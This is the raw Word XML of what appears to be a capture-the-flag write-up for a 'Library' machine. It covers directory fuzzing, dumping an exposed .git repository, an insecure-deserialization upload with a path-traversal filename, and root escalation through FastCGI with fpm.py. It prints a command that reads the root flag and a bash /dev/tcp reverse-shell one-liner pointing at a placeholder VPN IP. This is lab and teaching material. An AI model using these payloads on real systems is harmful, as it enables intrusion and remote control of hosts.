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Library ENG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kqdusfmhliu3"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t169ejhz3w7s"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336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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87n1zqi062d9"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x16eyky9ac4h"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ldzo6dqzvgn6" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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F">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11">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RPCBIND</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97200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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upload a JSON file to the website, and it will return a “prettified” JSON.</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32100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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ddq51756i97z" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf Scan:</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in that wordlist, then checks the status code. (If you are using Kali or ParrotOS, you can find these wordlists in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 or you can use those from SecLists.)</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32200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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found an exposed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. We can use the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git_dumper.py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9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/arthaud/git-dumper</w:t>
        </w:r>
      </w:hyperlink>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68600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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our dumped repository and reviewing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:b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file, we find our first flag =)</w:t>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94000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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wyzybd5z5njv" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Deserialization / Object Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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9i42e3ifhri3" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gadget:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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w8erb5h7jnrz" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>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565400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fpljbkxo5ffa" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: vert.json</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60"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upload our payload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vert.json</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and intercept the request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7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1971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Now we send it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater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6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send the request, and then generate our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gadget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6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return to Repeater and edit our request:</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filename="../sessions/sess_vert.json"</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send our request with the serialized object in the body.</w:t>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5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501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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on the website, we modify the cookie value to the name of our payload → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vert.json</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49600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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that, simply refresh the page and we receive the shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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7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f2ujb2bue65y" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell tty</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fully interactive TTYs:</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59"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our second flag, located in the directory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/opt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5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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7lgrhkje4wda" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.2n87s2o5b1d2" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FastCGI</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9000 - Pentesting FastCGI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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Checklist - Local Windows Privilege Escalation</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/pentesting/9000-pentesting-fastcgi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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netstat -nlapt</w:t>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4">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095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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ps aux | grep "root"</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73"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According to HackTricks, we can achieve RCE as the root user via FastCGI.</w:t>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download the file to our machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fpm.py.</w:t>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color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75</w:t>
        </w:r>
      </w:hyperlink>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it, we upload the file to the server, saving it in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75"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54"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script on the server, simply execute:</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fpm.py localhost /var/www/html/index.php -c "&lt;?php echo file_get_contents('/root/root.txt'); ?&gt;"</w:t>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allows us to read the root flag =)</w:t>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74"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83htyswc3w8d" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bonus - Reverse Shell</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fpm.py localhost /var/www/html/index.php -c '&lt;?php system("/bin/bash -c '\''bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1'\''"); ?&gt;'</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5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209800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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387600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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obtain a root shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId34" w:type="default"/>
      <w:headerReference r:id="rId35" w:type="first"/>
      <w:headerReference r:id="rId36" w:type="even"/>
      <w:footerReference r:id="rId37" w:type="default"/>
      <w:footerReference r:id="rId38" w:type="first"/>
      <w:footerReference r:id="rId39"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A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="18"/>
    <w:bookmarkEnd w:id="1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6" name="image14.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14.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B">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C">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6" name="image7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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Library ENG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4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting/9000-pentesting-fastcgi" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75" TargetMode="External"/><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0.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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xKP84Oq6o/lz5xidk3CculvFEQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmtxZHVzZm1obGl1MzIOaC50MTY5ZWpoejN3N3MyDmguODduMXpxaTA2MmQ5Mg5oLngxNmV5a3k5YWM0aDIOaC5sZHpvNmRxenZnbjYyDmguZGRxNTE3NTZpOTd6Mg5oLnd5enliZDV6NW5qdjIOaC45aTQyZTNpZmhyaTMyDmgudzhlcmI1aDdqbnJ6Mg5oLmZwbGpia3hvNWZmYTIOaC5mMnVqYjJidWU2NXkyDmguN2xncmhramU0d2RhMg5oLjJuODdzMm81YjFkMjIOaC44M2h0eXN3YzN3OGQyDmguMTc1ZjVjczk0ejBvOAByITFpd3lsX2FZdFc5Tmx6Z1h3R2xUeTZZVU5saHZBREdW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